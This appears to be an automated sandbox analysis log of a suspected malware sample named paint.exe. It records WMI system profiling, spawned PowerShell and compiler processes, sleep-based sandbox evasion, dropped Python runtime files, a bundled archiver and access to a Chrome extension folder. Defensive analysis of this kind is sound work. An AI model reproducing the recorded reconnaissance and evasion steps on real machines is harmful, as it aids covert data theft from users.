              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\getmac.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID=&quot;1&quot;} WHERE ResultClass=Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element=&quot;Win32_NetworkAdapter.DeviceID=\&quot;1\&quot;&quot;
              Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 3
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 3
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB0D632A str word ptr [rax+63h]1_2_00007FFDFB0D632A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2662Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2313
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2524
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 518
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3425
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 528
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4033
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2023
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4259
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 415
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2911
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1127
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2738
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1758
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-console-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-file-l1-2-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-util-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-file-l2-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\_bz2.pydJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-string-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\python312.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-file-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\unicodedata.pydJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-17459
              Source: C:\Users\user\Desktop\paint.exeAPI coverage: 5.6 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7360Thread sleep count: 2662 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7608Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7352Thread sleep count: 2313 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7788Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7356Thread sleep count: 2524 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7780Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7632Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7536Thread sleep count: 518 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8356Thread sleep time: -6456360425798339s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8308Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8416Thread sleep count: 3425 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8448Thread sleep time: -8301034833169293s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8420Thread sleep count: 528 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8436Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8108Thread sleep count: 4033 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8108Thread sleep count: 2023 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7936Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4916Thread sleep count: 4259 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7080Thread sleep count: 415 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7440Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5324Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1060Thread sleep count: 2911 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8912Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1060Thread sleep count: 1127 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8824Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8484Thread sleep count: 2738 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8480Thread sleep count: 1758 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8148Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9072Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\PING.EXELast function: Thread delayed
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BD92F0 FindFirstFileExW,FindClose,0_2_00007FF6F0BD92F0
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BD83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF6F0BD83B0
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BF18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF6F0BF18E4
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FF6F0BD92F0 FindFirstFileExW,FindClose,1_2_00007FF6F0BD92F0
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FF6F0BD83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF6F0BD83B0
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FF6F0BF18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF6F0BF18E4
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DF46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,88_2_00007FF623DF46EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DEE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,88_2_00007FF623DEE21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E388E0 FindFirstFileExA,88_2_00007FF623E388E0
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB071240 GetSystemInfo,1_2_00007FFDFB071240
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
